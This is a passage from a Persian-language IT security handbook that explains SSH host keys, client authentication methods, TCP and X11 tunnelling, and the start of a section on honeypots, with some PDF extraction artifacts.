ﻓﺮﺽ ﺑﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫﺮ ﻣﻴﺰﺑﺎﻥ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ SSHﺭﻭﻱ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﺷﻮﺩ ،ﺯﻭﺝ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ RSAﺧﺎﺹ ﺧﻮﺩ
)ﻛﻪ ﻛﻠﻴﺪ ﻣﻴﺰﺑﺎﻥ ٢٩٨SSHﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ( ﺭﺍ ﺩﺍﺭﺍ ﺍﺳﺖ .ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻧﺴﺨﺔ ﺩﻭﻡ ،ﺟﻔﺖﻛﻠﻴﺪ ﺛﺎﻧﻮﻳﻪﺍﻱ ﻧﻴﺰ ﺩﺍﺭﻧﺪ ﻛﻪ "ﻛﻠﻴﺪ DSA
ﻣﻴﺰﺑﺎﻥ" ﻧﺎﻡ ﺩﺍﺭﺩ ﻭ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ DSAﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ .ﻏﺎﻟﺐ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ - SSHﺍﮔﺮ ﺍﻳﻦ ﻛﻠﻴﺪ ﺍﺯ ﻗﺒﻞ
ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ -ﺁﻧﺮﺍ ﻫﻨﮕﺎﻡ ﺍﻭﻟﻴﻦ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﻨﺪ.
ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ SSHﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﺘﺼﻞ ﻣﻲﺷﻮﺩ ،ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺧﻮﺩ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ .ﺍﻳﻦ ﻛﻠﻴﺪ ﺩﻭ
ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ .ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺍﺯ ﺍﻳﻦ ﻛﻠﻴﺪ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺩﺭ ﻃﻮﻝ ﻋﻤﻠﻴﺎﺕ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ
ﻣﻲﻓﺮﺳﺘﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ؛ ﻭ ﺩﻭﻡ ﺍﻳﻨﻜﻪ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻌﻨﻮﺍﻥ ﻣﻌﺮﻑ ﻫﻮﻳﺖ ﺁﻥ ﺍﺳﺖ .ﻫﺮ ﺑﺎﺭ ﻛﻪ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺑﻪ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﺘﺼﻞ ﻣﻲﺷﻮﺩ ،ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻳﻜﺴﺎﻧﻲ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﺸﺘﺮﻱ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻫﺮ ﺑﺎﺭ ﺍﺗﺼﺎﻝ ﺑﻪ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺗﺸﺨﻴﺺ ﺩﻫﺪ ﻛﻪ ﺑﺎ ﻫﻤﺎﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻗﺒﻠﻲ ﺩﺭ ﺗﻤﺎﺱ ﺍﺳﺖ.
ﻛﻠﻴﺪ ﻣﻴﺰﺑﺎﻥ ﺩﺭ ﺑﺮﺍﺑﺮ ﺩﻭ ﻧﻮﻉ ﺣﻤﻠﻪ ﺍﻳﺠﺎﺩ ﻣﺤﺎﻓﻈﺖ ﻣﻲﻛﻨﺪ .ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﺑﻪ ﺷﻤﺎ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑﺎ ﻣﻴﺰﺑﺎﻥ ﺻﺤﻴﺢ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﻫﺴﺘﻴﺪ.
ﺍﮔﺮ ﻣﻴﺰﺑﺎﻧﻲ ﻛﻪ ﻗﺼﺪ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺁﻧﺮﺍ ﺩﺍﺭﻳﺪ ﺁﺩﺭﺱ IPﺧﻮﺩ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺑﺎﺷﺪ ﻭ ﻳﺎ ﻧﺎﻡ DNSﺟﺪﻳﺪﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ )ﻭ ﻳﺎ ﺍﮔﺮ ﺷﺨﺼﻲ ﺑﻪ
ﺳﻴﺴﺘﻢ DNSﺷﻤﺎ ﺣﻤﻠﻪ ﻛﺮﺩﻩ ﻭ ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﺁﺩﺭﺳﻬﺎﻱ IPﻧﺎﺻﺤﻴﺢ ﺭﺍ ﺗﻮﺯﻳﻊ ﻛﻨﺪ( ،ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ SSHﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﻣﻴﺰﺑﺎﻥ ﺟﺪﻳﺪ ﻳﻚ
ﻛﻠﻴﺪ ﻣﻴﺰﺑﺎﻥ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﺁﺩﺭﺱ ﻗﺪﻳﻤﻲ ﺩﺍﺭﺩ ﻭ ﺩﺭ ﺁﻧﺼﻮﺭﺕ ﺷﻤﺎ ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﻳﺪ ﻛﻪ ﻧﺒﺎﻳﺪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻛﻨﻴﺪ .ﺩﻭﻡ ﺍﻳﻨﻜﻪ ﺑﺎ ﻛﻠﻴﺪ
ﻣﻴﺰﺑﺎﻥ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﻳﺎﺑﻴﺪ ﻛﻪ ﻳﻚ ﺍﺭﺗﺒﺎﻁ ﺭﻣﺰﺷﺪﻩ ﻭ ﻣﺴﺘﻘﻴﻢ ﺑﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﺧﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ ﻭ ﻫﻴﭻ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﻃﻮﻝ ﻣﺴﻴﺮ
ﻗﺎﺩﺭ ﺑﻪ ﺍﻧﺠﺎﻡ ﺣﻤﻠﺔ "ﺷﺨﺺ ﺩﺭ ﻣﻴﺎﻥ ﺭﺍﻩ" ﻧﻴﺴﺖ .ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻳﻚ ﺣﻤﻠﺔ ﻣﻮﻓﻖ ﺍﺯ ﺍﻳﻦ ﻧﻮﻉ ،ﻣﻬﺎﺟﻢ ﻧﺎﭼﺎﺭ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ
ﺧﻮﺩ ﺍﺳﺖ -ﻳﻚ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻛﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﺘﻨﺎﻇﺮ ﺁﻧﺮﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﻣﺘﺄﺳﻔﺎﻧﻪ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﻛﻪ ﻛﻠﻴﺪﻫﺎﻱ ﻣﻴﺰﺑﺎﻥ ﻃﺒﻖ ﻗﺎﻋﺪﺓ ﻣﻨﻈﻤﻲ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ -ﮔﺎﻫﻲ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻛﻪ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺟﺪﻳﺪ ﻧﺼﺐ
ﻣﻲﺷﻮﺩ ،ﻳﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﻧﺼﺐ ﺟﺪﻳﺪ ﺍﺯ SSHﺑﻪ ﺍﺷﺘﺒﺎﻩ ﺑﺠﺎﻱ ﺣﻔﻆ ﻛﻠﻴﺪ ﻗﺒﻠﻲ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﻳﻚ ﻛﻠﻴﺪ ﻣﻴﺰﺑﺎﻥ ﺟﺪﻳﺪ ﺗﻮﻟﻴﺪ
ﻣﻲﻧﻤﺎﻳﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﺮﮔﺎﻩ ﻛﻠﻴﺪ ﻣﻴﺰﺑﺎﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻃﺮﻑ ﺍﺭﺗﺒﺎﻁ ﺗﻐﻴﻴﺮ ﻛﻨﺪ ،ﻧﺒﺎﻳﺪ ﺑﻼﻓﺎﺻﻠﻪ ﻧﺘﻴﺠﻪ ﮔﺮﻓﺖ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﻮﺭﺩ
ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﻭ ﻳﺎ ﻳﻚ ﺣﻤﻠﺔ "ﺷﺨﺺ ﺩﺭ ﻣﻴﺎﻥ ﺭﺍﻩ" ﺩﺭﺣﺎﻝ ﻭﻗﻮﻉ ﺍﺳﺖ؛ ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﺩﻳﺪ ﻛﻪ ﺩﻟﻴﻞ ﺗﻐﻴﻴﺮ ﻛﻠﻴﺪ ﭼﻪ ﺑﻮﺩﻩ ﺍﺳﺖ.
ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ SSHﻣﺘﺼﻞ ﻣﻲﺷﻮﺩ ،ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺣﺴﺎﺑﻲ ﻛﻪ ﻗﺼﺪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺩﺍﺭﺩ
ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ ،ﻭ ﺳﭙﺲ ﺑﺮﺍﻱ ﺍﺛﺒﺎﺕ ﺍﻳﻦ ﺍﺩﻋﺎ ﻳﻚ ﺳﻨﺪ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ .ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺁﻥ ﺳﻨﺪ ﺭﺍ ﻣﻌﺘﺒﺮ
ﺗﺸﺨﻴﺺ ﺩﻫﺪ ،ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﭘﻮﺳﺘﻪ ﺑﺮﺍﻱ ﺁﻥ ﻛﺎﺭﺑﺮ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ ﻭ ﻛﺎﺭﺑﺮ ﺭﺍ ﻭﺍﺭﺩ ﺁﻥ ﻣﻲﺳﺎﺯﺩ.
٢٩٩
SSHﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﺭﻭﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ،ﺭﻭﺷﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺨﺘﻠﻔﻲ ﺩﺍﺭﺩ:
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﻌﺘﺒﺮ ﺑﺮﺍﻱ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻣﻮﺟﻮﺩ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﺍﺭﺍﺋﻪ ﻛﻨﻨﺪ .ﺍﻳﻦ ﺭﻣﺰ •
ﻋﺒﻮﺭ ﺑﺼﻮﺭﺕ ﻣﺘﻦﺳﺎﺩﻩ ﻣﻨﺘﻘﻞ ﻧﻤﻲﺷﻮﺩ.
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﺧﻮﺩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺑﺎﻳﺪ •
ﻳﻚ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺭﺍﺋﻪ ﺩﻫﺪ ﻛﻪ ﺩﺭ ﻓﺎﻳﻞ ﻛﻠﻴﺪﻫﺎﻱ ﻣﺠﺎﺯ ﻣﺸﺘﺮﻱ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﻣﺸﺘﺮﻱ ﺑﺘﻮﺍﻧﺪ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺑﺎ ﺍﻳﻦ ﻛﻠﻴﺪ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ.
ﺦ ﻣﻮﺟﻮﺩﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ،Kerberosﺭﻣﺰ ﻋﺒﻮﺭ ﻳﻜﺒﺎﺭ ﻣﺼﺮﻑ ،ﻭ ﻳﺎ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﺭﺧﻮﺍﺳﺖ /ﭘﺎﺳ ﹺ •
ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ،ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﻮﻧﺪ.
SSHﻗﺎﺩﺭ ﺍﺳﺖ ﻳﻚ ﺍﺗﺼﺎﻝ TCPﺭﺍ ﺑﺼﻮﺭﺕ ﺗﻮﻧﻞ ﻣﻴﺎﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻭ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺛﺎﻧﻮﻳﻪ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ .ﺍﺑﺘﺪﺍ ﺍﺯ
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ SSHﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ﺗﺎ ﺍﺗﺼﺎﻟﻲ ﺑﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ SSHﺭﻭﻱ ﻣﺎﺷﻴﻦ ﺭﺍﻩ ﺩﻭﺭ ﺑﺮﻗﺮﺍﺭ ﺷﻮﺩ ﻭ ﺩﺭﺧﻮﺍﺳﺖ ﺍﻳﺠﺎﺩ ﺗﻮﻧﻞ ﺑﻪ
ﻝ ﺁﻥ ﺑﺮﻗﺮﺍﺭ ﮔﺮﺩﺩ،ﻳﻚ ﭘﻮﺭﺕ ﺩﻳﮕﺮ ﺁﻥ ﻣﺎﺷﻴﻦ ﺍﺭﺳﺎﻝ ﮔﺮﺩﺩ .ﭼﻨﺎﻧﭽﻪ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ SSHﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺑﺎﺷﺪ ﻭ ﺍﺗﺼﺎ ﹺ
ﺍﻳﻦ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺭﻭﻱ ﻳﻚ ﭘﻮﺭﺕ ﺟﺪﻳﺪ ﺭﺍﻳﺎﻧﺔ ﻣﻴﺰﺑﺎﻥ ﺧﻮﺩ ﺑﻪ ﺍﻧﺘﻈﺎﺭ ﻣﻲﺍﻳﺴﺘﺪ؛ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ SSHﺍﺗﺼﺎﻟﻲ ﺑﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺩﻭﻣﻲ ﻛﻪ ﺭﻭﻱ ﻣﺎﺷﻴﻦ ﺭﺍﻩ ﺩﻭﺭ ﺍﺳﺖ ﺑﺮﻗﺮﺍﺭ ﻣﻲﺳﺎﺯﺩ؛ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺩﻭﻡ ﺑﻪ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺗﺼﺎﻝ ﺑﺎ ﭘﻮﺭﺕ ﺟﺪﻳﺪ ﻣﻴﺰﺑﺎﻥ ﻣﺤﻠﻲ ﻫﺪﺍﻳﺖ
ﻣﻲﺷﻮﺩ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺩﺭﻳﺎﻓﺘﻲ ﺍﺯ ﺍﻳﻦ ﭘﻮﺭﺕ ﺟﺪﻳﺪ ﺗﻮﺳﻂ SSHﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ sshdﺍﻧﺘﻘﺎﻝ ﻣﻲﻳﺎﺑﺪ ،ﻭ ﺁﻥ ﻧﻴﺰ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺑﻪ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﺩﻭﻡ ﻣﻲﻓﺮﺳﺘﺪ.
ﻼ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ FTPﺑﺎﻳﺪ ﺍﺯ ﭼﻨﺪﻳﻦ ﺗﻮﻧﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ ﺑﺮﺧﻲ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬﺎ ﺭﺍ ﻧﻤﻲﺗﻮﺍﻥ ﺑﺎ ﻳﻚ ﺗﻮﻧﻞ ﺳﺎﺩﺓ TCPﻣﺤﺎﻓﻈﺖ ﻛﺮﺩ .ﻣﺜ ﹰ
٣٠٠
)ﻛﻪ ﭘﻴﺶﺑﻴﻨﻲ ﺑﺮﺧﻲ ﺍﺯ ﺁﻧﻬﺎ ﻣﺸﻜﻞ ﺍﺳﺖ( ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﻴﺸﺘﺮ ﻧﺴﺨﻪﻫﺎﻱ ،SSHﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ FTPﺟﺎﻳﮕﺰﻳﻦ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻄﺎﺑﻖ
ﺍﻧﺘﻈﺎﺭﻱ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺯ FTPﺩﺍﺭﻧﺪ ﻛﺎﺭ ﻣﻲﻛﻨﺪ ،ﺍﻣﺎ ﺍﺗﺼﺎﻻﺕ SSHﺭﺍ ﺑﻜﺎﺭ ﻣﻲﺑﺮﺩ .ﭘﺮﻭﺗﻜﻞ X-Windowsﻧﻴﺰ ﺍﺯ ﻣﺸﻜﻼﺕ ﻣﺸﺎﺑﻬﻲ
ﺭﻧﺞ ﻣﻲﺑﺮﺩ ،ﺍﻣﺎ ﺩﺭ ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ،SSHﺑﺮﺍﻱ ﺗﻮﻧﻞ ﺯﺩﻥ ﺍﺗﺼﺎﻝ X-Windowsﭘﺸﺘﻴﺒﺎﻧﻲ ﺧﺎﺹ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺑﺠﺎﻱ ﺍﺟﺮﺍﻱ
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺭﺍﻩ ﺩﻭﺭ Xﺭﻭﻱ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻣﺤﻠﻲ SSH ،Xﻳﻚ ﻧﻤﺎﻳﺸﮕﺮ ﻣﺠﺎﺯﻱ Xﻭ ﻳﻚ ﺗﻮﻧﻞ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ ﻛﻪ
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﺑﻪ ﺁﺳﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻣﺤﻠﻲ )ﺍﺯ ﻃﺮﻳﻖ (SSHﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ.
SSH ۲۹۹ﺭﻭﺷﻬﺎﻱ ﺑﺎ ﺍﻣﻨﻴﺖ ﻛﻤﺘﺮ ﻧﻴﺰ ﺩﺍﺭﺩ ﻛﻪ ﺑﺮ ﺍﺳﺎﺱ ﺁﺩﺭﺱ IPﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻭ ﻋﻤﻮﻣﹰﺎ ﺑﺎﻳﺪ ﺍﺯ ﺑﻜﺎﺭ ﺑﺮﺩﻥ ﺁﻧﻬﺎ ﺍﺟﺘﻨﺎﺏ ﻛﺮﺩ.
۳۰۰ﺍﻳﻦ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻣﻌﻤﻮ ﹰﻻ sftpﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٠٨
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻃﻌﻤﻪ
ﻳﻚ ﺭﻭﺵ ﺟﺪﻳﺪ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻣﻬﺎﺟﻤﺎﻥ ،ﺑﺮﭘﺎﻳﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻃﻌﻤﻪ ﺑﺮﺍﻱ ﺁﻧﺎﻥ ﺍﺳﺖ ﺗﺎ ﺑﺠﺎﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺻﻠﻲ ﺑﻪ ﺁﻧﻬﺎ ﺣﻤﻠﻪ ﻛﻨﻨﺪ ،ﻭ
ﻻ ﺑﻪ ﺷﺪﺕ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ .ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺗﻌﻤﺪﹰﺍ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ ﺗﺎ
ﻟﺬﺍ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻃﻌﻤﻪ ﻣﻌﻤﻮ ﹰ
ﺍﺣﺘﻤﺎﻝ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺁﻧﻬﺎ ﺑﺎﻻ ﺭﻭﺩ .ﺳﻴﺴﺘﻤﻬﺎﻱ ﻃﻌﻤﻪ ﻛﻪ ﮔﺎﻫﻲ "ﻛﻮﺯﺓ ﻋﺴﻞ" ﻧﻴﺰ ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ ﺩﻭ ﻣﺰﻳﺖ ﺍﺻﻠﻲ ﺩﺍﺭﻧﺪ:
ﺍﺯ ﺁﻧﺠﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻃﻌﻤﻪ ﺑﻪ ﺷﺪﺕ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ،ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻬﺎﺟﻤﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ .ﺑﺎ ﺍﻳﻦ .١
ﺳﻴﺴﺘﻤﻬﺎ ﻣﻲﺗﻮﺍﻥ ﻣﻮﻗﻌﻴﺖ ،ﺗﻜﻨﻴﻚ ،ﺍﻧﮕﻴﺰﻩ ،ﺳﻄﺢ ﻣﻬﺎﺭﺕ ،ﺍﻫﺪﺍﻑ ،ﻭ ﺳﺎﻳﺮ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﻬﺎﺟﻤﺎﻥ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﺩ.
ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻃﻌﻤﻪ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﻏﻨﻲ ﻭ ﺟﺬﺍﺏ ﺑﺎﺷﺪ ،ﻛﺎﻭﺵ ﺩﺭ ﺁﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﻘﺪﺭ ﻭﻗﺖ ﻣﻬﺎﺟﻢ ﺭﺍ ﺑﮕﻴﺮﺩ ﻛﻪ .٢
ﺩﻳﮕﺮ ﻓﺮﺻﺘﻲ ﺑﺮﺍﻱ ﺣﻤﻠﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺻﻠﻲ ﭘﻴﺪﺍ ﻧﻜﻨﺪ.
ﻼ ﺍﻃﻤﻴﻨﺎﻥ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻃﻌﻤﻪ ﻓﺎﺭﻍ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ ﻧﻴﺴﺘﻨﺪ .ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻤﺎﻥ ﻣﻄﻠﺐ ﻣﻬﻤﻲ ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺑﻴﺎﺑﺪ .ﺷﻤﺎ ﺑﺎﻳﺪ ﻛﺎﻣ ﹰ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻫﻴﭻ ﭼﻴﺰﻱ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻃﻌﻤﻪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺿﺮﺑﻪ ﺯﺩﻥ ﺑﻪ ﺷﻤﺎ
